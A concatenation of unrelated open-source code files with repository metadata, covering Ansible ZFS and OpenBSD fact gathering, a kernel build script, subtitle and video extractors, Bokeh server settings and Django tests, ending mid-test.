'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'specification': ('django.db.models.fields.TextField', [], {}),
'survey_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'survey.surveyuser': {
'Meta': {'object_name': 'SurveyUser'},
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'global_id': ('django.db.models.fields.CharField', [], {'default': "'6ca0cede-2234-44f3-ae1a-cc5214559505'", 'unique': 'True', 'max_length': '36'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_participation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.Participation']", 'null': 'True'}),
'last_participation_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'})
}
}
complete_apps = ['survey']
|
agpl-3.0
|
grimmjow8/ansible
|
lib/ansible/modules/storage/zfs/zpool_facts.py
|
22
|
6675
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2016, Adam ล tevko <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: zpool_facts
short_description: Gather facts about ZFS pools.
description:
- Gather facts from ZFS pool properties.
version_added: "2.3"
author: Adam ล tevko (@xen0l)
options:
name:
description:
- ZFS pool name.
alias: [ "pool", "zpool" ]
type: str
required: false
parsable:
description:
- Specifies if property values should be displayed in machine
friendly format.
type: bool
default: False
required: false
properties:
description:
- Specifies which dataset properties should be queried in comma-separated format.
For more information about dataset properties, check zpool(1M) man page.
alias: [ "props" ]
type: str
default: all
required: false
'''
EXAMPLES = '''
# Gather facts about ZFS pool rpool
zpool_facts: pool=rpool
# Gather space usage about all imported ZFS pools
zpool_facts: properties='free,size'
debug: msg='ZFS pool {{ item.name }} has {{ item.free }} free space out of {{ item.size }}.'
with_items: '{{ ansible_zfs_pools }}'
'''
RETURN = '''
name:
description: ZFS pool name
returned: always
type: string
sample: rpool
parsable:
description: if parsable output should be provided in machine friendly format.
returned: if 'parsable' is set to True
type: boolean
sample: True
zfs_pools:
description: ZFS pool facts
returned: always
type: string
sample:
{
"allocated": "3.46G",
"altroot": "-",
"autoexpand": "off",
"autoreplace": "off",
"bootfs": "rpool/ROOT/openindiana",
"cachefile": "-",
"capacity": "6%",
"comment": "-",
"dedupditto": "0",
"dedupratio": "1.00x",
"delegation": "on",
"expandsize": "-",
"failmode": "wait",
"feature@async_destroy": "enabled",
"feature@bookmarks": "enabled",
"feature@edonr": "enabled",
"feature@embedded_data": "active",
"feature@empty_bpobj": "active",
"feature@enabled_txg": "active",
"feature@extensible_dataset": "enabled",
"feature@filesystem_limits": "enabled",
"feature@hole_birth": "active",
"feature@large_blocks": "enabled",
"feature@lz4_compress": "active",
"feature@multi_vdev_crash_dump": "enabled",
"feature@sha512": "enabled",
"feature@skein": "enabled",
"feature@spacemap_histogram": "active",
"fragmentation": "3%",
"free": "46.3G",
"freeing": "0",
"guid": "15729052870819522408",
"health": "ONLINE",
"leaked": "0",
"listsnapshots": "off",
"name": "rpool",
"readonly": "off",
"size": "49.8G",
"version": "-"
}
'''
import os
from collections import defaultdict
from ansible.module_utils.six import iteritems
from ansible.module_utils.basic import AnsibleModule
class ZPoolFacts(object):
def __init__(self, module):
self.module = module
self.name = module.params['name']
self.parsable = module.params['parsable']
self.properties = module.params['properties']
self._pools = defaultdict(dict)
self.facts = []
def pool_exists(self):
cmd = [self.module.get_bin_path('zpool')]
cmd.append('list')
cmd.append(self.name)
(rc, out, err) = self.module.run_command(cmd)
if rc == 0:
return True
else:
return False
def get_facts(self):
cmd = [self.module.get_bin_path('zpool')]
cmd.append('get')
cmd.append('-H')
if self.parsable:
cmd.append('-p')
cmd.append('-o')
cmd.append('name,property,value')
cmd.append(self.properties)
if self.name:
cmd.append(self.name)
(rc, out, err) = self.module.run_command(cmd)
if rc == 0:
for line in out.splitlines():
pool, property, value = line.split('\t')
self._pools[pool].update({property: value})
for k, v in iteritems(self._pools):
v.update({'name': k})
self.facts.append(v)
return {'ansible_zfs_pools': self.facts}
else:
self.module.fail_json(msg='Error while trying to get facts about ZFS pool: %s' % self.name,
stderr=err,
rc=rc)
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(required=False, aliases=['pool', 'zpool'], type='str'),
parsable=dict(required=False, default=False, type='bool'),
properties=dict(required=False, default='all', type='str'),
),
supports_check_mode=True
)
zpool_facts = ZPoolFacts(module)
result = {}
result['changed'] = False
result['name'] = zpool_facts.name
if zpool_facts.parsable:
result['parsable'] = zpool_facts.parsable
if zpool_facts.name is not None:
if zpool_facts.pool_exists():
result['ansible_facts'] = zpool_facts.get_facts()
else:
module.fail_json(msg='ZFS pool %s does not exist!' % zpool_facts.name)
else:
result['ansible_facts'] = zpool_facts.get_facts()
module.exit_json(**result)
if __name__ == '__main__':
main()
|
gpl-3.0
|
haad/ansible
|
lib/ansible/module_utils/facts/network/openbsd.py
|
232
|
1600
|
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.module_utils.facts.network.base import NetworkCollector
from ansible.module_utils.facts.network.generic_bsd import GenericBsdIfconfigNetwork
class OpenBSDNetwork(GenericBsdIfconfigNetwork):
"""
This is the OpenBSD Network Class.
It uses the GenericBsdIfconfigNetwork.
"""
platform = 'OpenBSD'
# OpenBSD 'ifconfig -a' does not have information about aliases
def get_interfaces_info(self, ifconfig_path, ifconfig_options='-aA'):
return super(OpenBSDNetwork, self).get_interfaces_info(ifconfig_path, ifconfig_options)
# Return macaddress instead of lladdr
def parse_lladdr_line(self, words, current_if, ips):
current_if['macaddress'] = words[1]
current_if['type'] = 'ether'
class OpenBSDNetworkCollector(NetworkCollector):
_fact_class = OpenBSDNetwork
_platform = 'OpenBSD'
|
gpl-3.0
|
Cl3Kener/UBER-L
|
scripts/build-all.py
|
305
|
10150
|
#! /usr/bin/env python
# Copyright (c) 2009-2013, The Linux Foundation. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of The Linux Foundation nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NON-INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Build the kernel for all targets using the Android build environment.
#
# TODO: Accept arguments to indicate what to build.
import glob
from optparse import OptionParser
import subprocess
import os
import os.path
import re
import shutil
import sys
version = 'build-all.py, version 0.01'
build_dir = '../all-kernels'
make_command = ["vmlinux", "modules", "dtbs"]
make_env = os.environ
make_env.update({
'ARCH': 'arm',
'CROSS_COMPILE': 'arm-none-linux-gnueabi-',
'KCONFIG_NOTIMESTAMP': 'true' })
all_options = {}
def error(msg):
sys.stderr.write("error: %s\n" % msg)
def fail(msg):
"""Fail with a user-printed message"""
error(msg)
sys.exit(1)
def check_kernel():
"""Ensure that PWD is a kernel directory"""
if (not os.path.isfile('MAINTAINERS') or
not os.path.isfile('arch/arm/mach-msm/Kconfig')):
fail("This doesn't seem to be an MSM kernel dir")
def check_build():
"""Ensure that the build directory is present."""
if not os.path.isdir(build_dir):
try:
os.makedirs(build_dir)
except OSError as exc:
if exc.errno == errno.EEXIST:
pass
else:
raise
def update_config(file, str):
print 'Updating %s with \'%s\'\n' % (file, str)
defconfig = open(file, 'a')
defconfig.write(str + '\n')
defconfig.close()
def scan_configs():
"""Get the full list of defconfigs appropriate for this tree."""
names = {}
arch_pats = (
r'[fm]sm[0-9]*_defconfig',
r'apq*_defconfig',
r'qsd*_defconfig',
)
for p in arch_pats:
for n in glob.glob('arch/arm/configs/' + p):
names[os.path.basename(n)[:-10]] = n
return names
class Builder:
def __init__(self, logname):
self.logname = logname
self.fd = open(logname, 'w')
def run(self, args):
devnull = open('/dev/null', 'r')
proc = subprocess.Popen(args, stdin=devnull,
env=make_env,
bufsize=0,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
count = 0
# for line in proc.stdout:
rawfd = proc.stdout.fileno()
while True:
line = os.read(rawfd, 1024)
if not line:
break
self.fd.write(line)
self.fd.flush()
if all_options.verbose:
sys.stdout.write(line)
sys.stdout.flush()
else:
for i in range(line.count('\n')):
count += 1
if count == 64:
count = 0
print
sys.stdout.write('.')
sys.stdout.flush()
print
result = proc.wait()
self.fd.close()
return result
failed_targets = []
def build(target):
dest_dir = os.path.join(build_dir, target)
log_name = '%s/log-%s.log' % (build_dir, target)
print 'Building %s in %s log %s' % (target, dest_dir, log_name)
if not os.path.isdir(dest_dir):
os.mkdir(dest_dir)
defconfig = 'arch/arm/configs/%s_defconfig' % target
dotconfig = '%s/.config' % dest_dir
savedefconfig = '%s/defconfig' % dest_dir
shutil.copyfile(defconfig, dotconfig)
staging_dir = 'install_staging'
modi_dir = '%s' % staging_dir
hdri_dir = '%s/usr' % staging_dir
shutil.rmtree(os.path.join(dest_dir, staging_dir), ignore_errors=True)
devnull = open('/dev/null', 'r')
subprocess.check_call(['make', 'O=%s' % dest_dir,
'%s_defconfig' % target], env=make_env, stdin=devnull)
devnull.close()
if not all_options.updateconfigs:
# Build targets can be dependent upon the completion of previous
# build targets, so build them one at a time.
cmd_line = ['make',
'INSTALL_HDR_PATH=%s' % hdri_dir,
'INSTALL_MOD_PATH=%s' % modi_dir,
'O=%s' % dest_dir]
build_targets = []
for c in make_command:
if re.match(r'^-{1,2}\w', c):
cmd_line.append(c)
else:
build_targets.append(c)
for t in build_targets:
build = Builder(log_name)
result = build.run(cmd_line + [t])
if result != 0:
if all_options.keep_going:
failed_targets.append(target)
fail_or_error = error
else:
fail_or_error = fail
fail_or_error("Failed to build %s, see %s" %
(target, build.logname))
# Copy the defconfig back.
if all_options.configs or all_options.updateconfigs:
devnull = open('/dev/null', 'r')
subprocess.check_call(['make', 'O=%s' % dest_dir,
'savedefconfig'], env=make_env, stdin=devnull)
devnull.close()
shutil.copyfile(savedefconfig, defconfig)
def build_many(allconf, targets):
print "Building %d target(s)" % len(targets)
for target in targets:
if all_options.updateconfigs:
update_config(allconf[target], all_options.updateconfigs)
build(target)
if failed_targets:
fail('\n '.join(["Failed targets:"] +
[target for target in failed_targets]))
def main():
global make_command
check_kernel()
check_build()
configs = scan_configs()
usage = ("""
%prog [options] all -- Build all targets
%prog [options] target target ... -- List specific targets
%prog [options] perf -- Build all perf targets
%prog [options] noperf -- Build all non-perf targets""")
parser = OptionParser(usage=usage, version=version)
parser.add_option('--configs', action='store_true',
dest='configs',
help="Copy configs back into tree")
parser.add_option('--list', action='store_true',
dest='list',
help='List available targets')
parser.add_option('-v', '--verbose', action='store_true',
dest='verbose',
help='Output to stdout in addition to log file')
parser.add_option('--oldconfig', action='store_true',
dest='oldconfig',
help='Only process "make oldconfig"')
parser.add_option('--updateconfigs',
dest='updateconfigs',
help="Update defconfigs with provided option setting, "
"e.g. --updateconfigs=\'CONFIG_USE_THING=y\'")
parser.add_option('-j', '--jobs', type='int', dest="jobs",
help="Number of simultaneous jobs")
parser.add_option('-l', '--load-average', type='int',
dest='load_average',
help="Don't start multiple jobs unless load is below LOAD_AVERAGE")
parser.add_option('-k', '--keep-going', action='store_true',
dest='keep_going', default=False,
help="Keep building other targets if a target fails")
parser.add_option('-m', '--make-target', action='append',
help='Build the indicated make target (default: %s)' %
' '.join(make_command))
(options, args) = parser.parse_args()
global all_options
all_options = options
if options.list:
print "Available targets:"
for target in configs.keys():
print " %s" % target
sys.exit(0)
if options.oldconfig:
make_command = ["oldconfig"]
elif options.make_target:
make_command = options.make_target
if options.jobs:
make_command.append("-j%d" % options.jobs)
if options.load_average:
make_command.append("-l%d" % options.load_average)
if args == ['all']:
build_many(configs, configs.keys())
elif args == ['perf']:
targets = []
for t in configs.keys():
if "perf" in t:
targets.append(t)
build_many(configs, targets)
elif args == ['noperf']:
targets = []
for t in configs.keys():
if "perf" not in t:
targets.append(t)
build_many(configs, targets)
elif len(args) > 0:
targets = []
for t in args:
if t not in configs.keys():
parser.error("Target '%s' not one of %s" % (t, configs.keys()))
targets.append(t)
build_many(configs, targets)
else:
parser.error("Must specify a target to build, or 'all'")
if __name__ == "__main__":
main()
|
gpl-2.0
|
jordan8037310/CouchPotatoServer
|
libs/subliminal/services/subscenter.py
|
43
|
4387
|
# -*- coding: utf-8 -*-
# Copyright 2012 Ofir Brukner <[email protected]>
#
# This file is part of subliminal.
#
# subliminal is free software; you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# subliminal is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with subliminal. If not, see <http://www.gnu.org/licenses/>.
import logging
import re
import json
from . import ServiceBase
from ..exceptions import ServiceError
from ..language import language_set
from ..subtitles import get_subtitle_path, ResultSubtitle
from ..videos import Episode, Movie
from ..utils import to_unicode, get_keywords
logger = logging.getLogger(__name__)
class Subscenter(ServiceBase):
server_url = 'http://subscenter.cinemast.com/he/'
api_based = False
languages = language_set(['he', 'en'])
videos = [Episode, Movie]
require_video = False
required_features = ['permissive']
@staticmethod
def slugify(string):
new_string = string.replace(' ', '-').replace("'", '').replace(':', '').lower()
# We remove multiple spaces by using this regular expression.
return re.sub('-+', '-', new_string)
def list_checked(self, video, languages):
series = None
season = None
episode = None
title = video.title
if isinstance(video, Episode):
series = video.series
season = video.season
episode = video.episode
return self.query(video.path or video.release, languages, get_keywords(video.guess), series, season,
episode, title)
def query(self, filepath, languages=None, keywords=None, series=None, season=None, episode=None, title=None):
logger.debug(u'Getting subtitles for %s season %d episode %d with languages %r' % (series, season, episode, languages))
# Converts the title to Subscenter format by replacing whitespaces and removing specific chars.
if series and season and episode:
# Search for a TV show.
kind = 'episode'
slugified_series = self.slugify(series)
url = self.server_url + 'cinemast/data/series/sb/' + slugified_series + '/' + str(season) + '/' + \
str(episode) + '/'
elif title:
# Search for a movie.
kind = 'movie'
slugified_title = self.slugify(title)
url = self.server_url + 'cinemast/data/movie/sb/' + slugified_title + '/'
else:
raise ServiceError('One or more parameters are missing')
logger.debug('Searching subtitles %r', {'title': title, 'season': season, 'episode': episode})
response = self.session.get(url)
if response.status_code != 200:
raise ServiceError('Request failed with status code %d' % response.status_code)
subtitles = []
response_json = json.loads(response.content)
for lang, lang_json in response_json.items():
lang_obj = self.get_language(lang)
if lang_obj in self.languages and lang_obj in languages:
for group_data in lang_json.values():
for quality in group_data.values():
for sub in quality.values():
release = sub.get('subtitle_version')
sub_path = get_subtitle_path(filepath, lang_obj, self.config.multi)
link = self.server_url + 'subtitle/download/' + lang + '/' + str(sub.get('id')) + \
'/?v=' + release + '&key=' + str(sub.get('key'))
subtitles.append(ResultSubtitle(sub_path, lang_obj, self.__class__.__name__.lower(),
link, release=to_unicode(release)))
return subtitles
def download(self, subtitle):
self.download_zip_file(subtitle.link, subtitle.path)
return subtitle
Service = Subscenter
|
gpl-3.0
|
ARPASMR/IRIS_lombardia
|
html/OpenLayers-2.13.1/tests/selenium/remotecontrol/test_ol.py
|
254
|
2873
|
from selenium import selenium
import time
import sys
from ConfigParser import ConfigParser
MAX_TEST_LENGTH = 300
if len(sys.argv) > 2:
filename = sys.argv[2]
else:
filename = "config.cfg"
c = ConfigParser()
c.read(filename)
targets = {}
server = c.get('config', 'server')
url= c.get('config', 'url')
if c.has_option('config', 'timeout'):
MAX_TEST_LENGTH = int(c.get('config', 'timeout'))
sections = c.sections()
for s in sections:
if s == 'config':
continue
targets[s] = dict(c.items(s))
targets[s]['name'] = s
if sys.argv[1] == "all":
browsers = list(targets.values())
elif sys.argv[1] not in targets:
print "Invalid target"
sys.exit()
else:
browsers = [targets[sys.argv[1]]]
keep_going = True
if 1:
for b in browsers:
if not keep_going:
continue
print "Running %s on %s" % (b['name'], b['host'])
s = selenium(b['host'], 4444, "*%s" % b['browsercmd'], server)
s.start()
try:
s.open_window(url, "test_running")
time.sleep(2)
s.select_window("test_running")
time.sleep(2)
s.refresh()
count = 0
while count == 0:
count = int(s.get_eval("window.document.getElementById('testtable').getElementsByTagName('tr').length"))
time.sleep(5)
ok = 0
fail = 0
last_change = time.time()
while True:
new_ok = int(s.get_eval('window.Test.AnotherWay._g_ok_pages'))
new_fail = int(s.get_eval('window.Test.AnotherWay._g_fail_pages'))
if new_ok != ok or new_fail != fail:
ok = new_ok
fail = new_fail
last_change = time.time()
if (ok + fail) >= count:
break
if time.time() - last_change > MAX_TEST_LENGTH:
raise Exception("Failed: with %s okay and %s failed, ran out of time: %s is more than %s" % (ok, fail, (time.time() - last_change), MAX_TEST_LENGTH))
time.sleep(10)
if fail:
print "Failed: %s" % fail
html = s.get_eval("window.document.getElementById('results').innerHTML").encode("utf-8")
all_html = """<html>
<head>
<meta content="text/html; charset=utf-8" http-equiv="content-type" />
</head>
<body>%s</body></html>""" % html
f = open("fail.%s.%s.html" % (time.time(), b['name']), "w")
f.write(all_html)
f.close()
except KeyboardInterrupt, E:
keep_going = False
print "Stopped by keyboard interrupt"
except Exception, E:
print "Error: ", E
s.stop()
|
gpl-3.0
|
remitamine/youtube-dl
|
youtube_dl/extractor/frontendmasters.py
|
14
|
8807
|
# coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..compat import (
compat_str,
compat_urlparse,
)
from ..utils import (
ExtractorError,
parse_duration,
url_or_none,
urlencode_postdata,
)
class FrontendMastersBaseIE(InfoExtractor):
_API_BASE = 'https://api.frontendmasters.com/v1/kabuki'
_LOGIN_URL = 'https://frontendmasters.com/login/'
_NETRC_MACHINE = 'frontendmasters'
_QUALITIES = {
'low': {'width': 480, 'height': 360},
'mid': {'width': 1280, 'height': 720},
'high': {'width': 1920, 'height': 1080}
}
def _real_initialize(self):
self._login()
def _login(self):
(username, password) = self._get_login_info()
if username is None:
return
login_page = self._download_webpage(
self._LOGIN_URL, None, 'Downloading login page')
login_form = self._hidden_inputs(login_page)
login_form.update({
'username': username,
'password': password
})
post_url = self._search_regex(
r'<form[^>]+action=(["\'])(?P<url>.+?)\1', login_page,
'post_url', default=self._LOGIN_URL, group='url')
if not post_url.startswith('http'):
post_url = compat_urlparse.urljoin(self._LOGIN_URL, post_url)
response = self._download_webpage(
post_url, None, 'Logging in', data=urlencode_postdata(login_form),
headers={'Content-Type': 'application/x-www-form-urlencoded'})
# Successful login
if any(p in response for p in (
'wp-login.php?action=logout', '>Logout')):
return
error = self._html_search_regex(
r'class=(["\'])(?:(?!\1).)*\bMessageAlert\b(?:(?!\1).)*\1[^>]*>(?P<error>[^<]+)<',
response, 'error message', default=None, group='error')
if error:
raise ExtractorError('Unable to login: %s' % error, expected=True)
raise ExtractorError('Unable to log in')
class FrontendMastersPageBaseIE(FrontendMastersBaseIE):
def _download_course(self, course_name, url):
return self._download_json(
'%s/courses/%s' % (self._API_BASE, course_name), course_name,
'Downloading course JSON', headers={'Referer': url})
@staticmethod
def _extract_chapters(course):
chapters = []
lesson_elements = course.get('lessonElements')
if isinstance(lesson_elements, list):
chapters = [url_or_none(e) for e in lesson_elements if url_or_none(e)]
return chapters
@staticmethod
def _extract_lesson(chapters, lesson_id, lesson):
title = lesson.get('title') or lesson_id
display_id = lesson.get('slug')
description = lesson.get('description')
thumbnail = lesson.get('thumbnail')
chapter_number = None
index = lesson.get('index')
element_index = lesson.get('elementIndex')
if (isinstance(index, int) and isinstance(element_index, int)
and index < element_index):
chapter_number = element_index - index
chapter = (chapters[chapter_number - 1]
if chapter_number - 1 < len(chapters) else None)
duration = None
timestamp = lesson.get('timestamp')
if isinstance(timestamp, compat_str):
mobj = re.search(
r'(?P<start>\d{1,2}:\d{1,2}:\d{1,2})\s*-(?P<end>\s*\d{1,2}:\d{1,2}:\d{1,2})',
timestamp)
if mobj:
duration = parse_duration(mobj.group('end')) - parse_duration(
mobj.group('start'))
return {
'_type': 'url_transparent',
'url': 'frontendmasters:%s' % lesson_id,
'ie_key': FrontendMastersIE.ie_key(),
'id': lesson_id,
'display_id': display_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'duration': duration,
'chapter': chapter,
'chapter_number': chapter_number,
}
class FrontendMastersIE(FrontendMastersBaseIE):
_VALID_URL = r'(?:frontendmasters:|https?://api\.frontendmasters\.com/v\d+/kabuki/video/)(?P<id>[^/]+)'
_TESTS = [{
'url': 'https://api.frontendmasters.com/v1/kabuki/video/a2qogef6ba',
'md5': '7f161159710d6b7016a4f4af6fcb05e2',
'info_dict': {
'id': 'a2qogef6ba',
'ext': 'mp4',
'title': 'a2qogef6ba',
},
'skip': 'Requires FrontendMasters account credentials',
}, {
'url': 'frontendmasters:a2qogef6ba',
'only_matching': True,
}]
def _real_extract(self, url):
lesson_id = self._match_id(url)
source_url = '%s/video/%s/source' % (self._API_BASE, lesson_id)
formats = []
for ext in ('webm', 'mp4'):
for quality in ('low', 'mid', 'high'):
resolution = self._QUALITIES[quality].copy()
format_id = '%s-%s' % (ext, quality)
format_url = self._download_json(
source_url, lesson_id,
'Downloading %s source JSON' % format_id, query={
'f': ext,
'r': resolution['height'],
}, headers={
'Referer': url,
}, fatal=False)['url']
if not format_url:
continue
f = resolution.copy()
f.update({
'url': format_url,
'ext': ext,
'format_id': format_id,
})
formats.append(f)
self._sort_formats(formats)
subtitles = {
'en': [{
'url': '%s/transcripts/%s.vtt' % (self._API_BASE, lesson_id),
}]
}
return {
'id': lesson_id,
'title': lesson_id,
'formats': formats,
'subtitles': subtitles
}
class FrontendMastersLessonIE(FrontendMastersPageBaseIE):
_VALID_URL = r'https?://(?:www\.)?frontendmasters\.com/courses/(?P<course_name>[^/]+)/(?P<lesson_name>[^/]+)'
_TEST = {
'url': 'https://frontendmasters.com/courses/web-development/tools',
'info_dict': {
'id': 'a2qogef6ba',
'display_id': 'tools',
'ext': 'mp4',
'title': 'Tools',
'description': 'md5:82c1ea6472e88ed5acd1829fe992e4f7',
'thumbnail': r're:^https?://.*\.jpg$',
'chapter': 'Introduction',
'chapter_number': 1,
},
'params': {
'skip_download': True,
},
'skip': 'Requires FrontendMasters account credentials',
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
course_name, lesson_name = mobj.group('course_name', 'lesson_name')
course = self._download_course(course_name, url)
lesson_id, lesson = next(
(video_id, data)
for video_id, data in course['lessonData'].items()
if data.get('slug') == lesson_name)
chapters = self._extract_chapters(course)
return self._extract_lesson(chapters, lesson_id, lesson)
class FrontendMastersCourseIE(FrontendMastersPageBaseIE):
_VALID_URL = r'https?://(?:www\.)?frontendmasters\.com/courses/(?P<id>[^/]+)'
_TEST = {
'url': 'https://frontendmasters.com/courses/web-development/',
'info_dict': {
'id': 'web-development',
'title': 'Introduction to Web Development',
'description': 'md5:9317e6e842098bf725d62360e52d49a6',
},
'playlist_count': 81,
'skip': 'Requires FrontendMasters account credentials',
}
@classmethod
def suitable(cls, url):
return False if FrontendMastersLessonIE.suitable(url) else super(
FrontendMastersBaseIE, cls).suitable(url)
def _real_extract(self, url):
course_name = self._match_id(url)
course = self._download_course(course_name, url)
chapters = self._extract_chapters(course)
lessons = sorted(
course['lessonData'].values(), key=lambda data: data['index'])
entries = []
for lesson in lessons:
lesson_name = lesson.get('slug')
if not lesson_name:
continue
lesson_id = lesson.get('hash') or lesson.get('statsId')
entries.append(self._extract_lesson(chapters, lesson_id, lesson))
title = course.get('title')
description = course.get('description')
return self.playlist_result(entries, course_name, title, description)
|
unlicense
|
rhiever/bokeh
|
bokeh/server/settings.py
|
25
|
3038
|
from __future__ import absolute_import
from os.path import dirname, join
import uuid
import imp
import zmq
from ..settings import settings as bokeh_settings
default_blaze_config = join(dirname(__file__), 'blaze', 'config.py')
_defaults = dict(
ip="0.0.0.0",
port=5006,
url_prefix="",
multi_user=False,
# make scripts for now - for now cli will only
# pass one script
scripts="",
model_backend={'type' : 'shelve'},
# model_backend={'type' : redis, 'redis_port' : 7001, 'start-redis' : True},
# model_backend={'type' : memory},
# model_backend={'type' : shelve},
filter_logs=False,
ws_conn_string=None,
pub_zmqaddr="inproc://bokeh_in",
sub_zmqaddr="inproc://bokeh_out",
debug=False,
dev=False,
splitjs=False,
robust_reload=False,
verbose=False,
run_forwarder=True,
secret_key=str(uuid.uuid4()),
blaze_config=default_blaze_config,
)
class Settings(object):
_debugjs = False
_ctx = None
fields = _defaults.keys()
def reset(self):
for k,v in _defaults.items():
setattr(self, k, v)
@property
def ctx(self):
if self._ctx is None or self._ctx.closed:
self._ctx = zmq.Context()
return self._ctx
@property
def debugjs(self):
return bokeh_settings.debugjs
@debugjs.setter
def debugjs(self, val):
bokeh_settings.debugjs = val
def from_file(self, filename=None):
name = "_bokeh_server_configuration"
mod = imp.load_source(name, filename)
for k in self.fields:
v = getattr(mod, k, None)
if v is not None:
setattr(self, k, v)
self.process_settings()
def from_dict(self, input_dict):
for k,v in input_dict.items():
setattr(self, k, v)
def from_args(self, args):
self.ip = args.ip
self.port = args.port
self.multi_user = args.multi_user
self.model_backend = {'type' : args.backend}
if self.model_backend['type'] == 'redis':
self.model_backend.update({
'redis_port' : args.redis_port,
'start-redis' : args.start_redis
})
self.ws_conn_string = args.ws_conn_string
self.debug = args.debug
self.debugjs = args.debugjs
self.splitjs = args.splitjs
self.robust_reload = args.robust_reload
self.verbose = args.verbose
self.run_forwarder = True
if args.blaze_config is not None:
self.blaze_config = args.blaze_config
if args.script:
self.scripts = [args.script]
if args.url_prefix:
self.url_prefix = args.url_prefix
def process_settings(self):
if self.url_prefix:
if not self.url_prefix.startswith("/"):
self.url_prefix = "/" + self.url_prefix
if self.url_prefix.endswith("/"):
self.url_prefix = self.url_prefix[:-1]
settings = Settings()
settings.reset()
del Settings
|
bsd-3-clause
|
x303597316/hue
|
desktop/core/ext-py/Django-1.6.10/tests/utils_tests/test_termcolors.py
|
60
|
7696
|
from django.utils import unittest
from django.utils.termcolors import (parse_color_setting, PALETTES,
DEFAULT_PALETTE, LIGHT_PALETTE, DARK_PALETTE, NOCOLOR_PALETTE, colorize)
class TermColorTests(unittest.TestCase):
def test_empty_string(self):
self.assertEqual(parse_color_setting(''), PALETTES[DEFAULT_PALETTE])
def test_simple_palette(self):
self.assertEqual(parse_color_setting('light'), PALETTES[LIGHT_PALETTE])
self.assertEqual(parse_color_setting('dark'), PALETTES[DARK_PALETTE])
self.assertEqual(parse_color_setting('nocolor'), None)
def test_fg(self):
self.assertEqual(parse_color_setting('error=green'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green'}))
def test_fg_bg(self):
self.assertEqual(parse_color_setting('error=green/blue'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'bg':'blue'}))
def test_fg_opts(self):
self.assertEqual(parse_color_setting('error=green,blink'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'opts': ('blink',)}))
self.assertEqual(parse_color_setting('error=green,bold,blink'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'opts': ('blink','bold')}))
def test_fg_bg_opts(self):
self.assertEqual(parse_color_setting('error=green/blue,blink'),
